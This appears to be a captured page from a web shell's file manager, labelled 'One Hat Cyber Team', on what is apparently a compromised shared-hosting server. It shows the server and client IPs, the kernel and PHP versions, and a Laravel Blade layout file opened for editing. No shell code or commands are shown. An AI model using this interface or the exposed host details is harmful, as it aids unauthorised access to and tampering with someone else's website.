⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.60
Server IP:
68.65.123.197
Server:
Linux premium49.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
smarbgfw
/
www
/
updater
/
resources
/
views
/
user
/
Edit File: layout.blade.php
{{$bs->website_title}} @yield('pagename')
@if ($rtl == 1)
@endif
secondary_base_color : ""}}" rel="stylesheet"> @if ($be->theme_version == 'dark')
@endif @yield('styles')
{{$bs->support_email}}
{{$bs->support_phone}}
@foreach ($socials as $key => $social)
@endforeach
@if (!empty($currentLang))
{{convertUtf8($currentLang->name)}}
@foreach ($langs as $key => $lang)
code) }}'>{{convertUtf8($lang->name)}}
@endforeach
@endif @auth
{{Auth::user()->username}}
{{__('Dashboard')}}
@if ($bex->recurring_billing == 1)
{{__('Packages')}}
@endif @if ($bex->is_shop == 1 && $bex->catalog_mode == 0)
{{__('Product Orders')}}
@endif @if ($bex->recurring_billing == 0)
{{__('Package Orders')}}
@endif @if ($bex->is_course == 1)
{{__('Courses')}}
@endif @if ($bex->is_event == 1)
{{__('Event Bookings')}}
@endif @if ($bex->is_donation == 1)
{{__('Donations')}}
@endif @if ($bex->is_ticket == 1)
{{__('Support Tickets')}}
@endif
{{__('Edit Profile')}}
@if ($bex->is_shop == 1 && $bex->catalog_mode == 0)
{{__('Shipping Details')}}
{{__('Billing Details')}}
{{__('Change Password')}}
@endif
{{__('Logout')}}
@endauth
@includeIf('front.default.partials.navbar')
@yield('content') @if ($bex->is_shop == 1 && $bex->catalog_mode == 0)
{{cartLength()}} {{__('ITEMS')}}
{{$bex->base_currency_symbol_position == 'left' ? $bex->base_currency_symbol : ''}} {{cartTotal()}} {{$bex->base_currency_symbol_position == 'right' ? $bex->base_currency_symbol : ''}}
@endif
{{-- Loader --}}
{{-- Loader --}} @yield('scripts') @if (session()->has('success')) @endif @if (session()->has('error')) @endif
Simpan